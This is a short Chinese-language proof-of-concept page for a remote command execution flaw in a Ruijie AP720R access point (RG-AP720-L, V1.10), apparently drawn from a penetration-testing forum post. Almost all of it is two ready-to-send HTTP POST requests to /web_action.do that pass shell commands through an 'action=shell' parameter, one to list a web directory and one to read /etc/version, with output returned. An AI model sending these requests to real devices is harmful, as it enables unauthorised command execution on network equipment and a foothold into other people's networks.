锐捷某型号设备远程命令执行(RCE)漏洞 PoC

原文

渗透测试学习(锐捷AP720R)
https://xianzhi.aliyun.com/forum/topic/1538/

型号

路由器 瑞捷 AP720R
Model型号: RG-AP720-L
Version: V1.10

有回显

POC

POC1

POST /web_action.do HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/
Content-Length: 70
Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; SID=F23E18BDA014D308240A53206BEAD58; login=1; mac=0074.9c2b.472c; oid=
Connection: close

action=shell&command=ls+-l+%2Fdata%2F.rgos%2Fvsd%2F0%2Foam%2Fweb%2Fxml

POC2

POST /web_action.do HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/
Content-Length: 70
Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; SID=F23E18BDA014D308240A53206BEAD58; login=1; mac=0074.9c2b.472c; oid=
Connection: close

action=shell&command=cat+/etc/version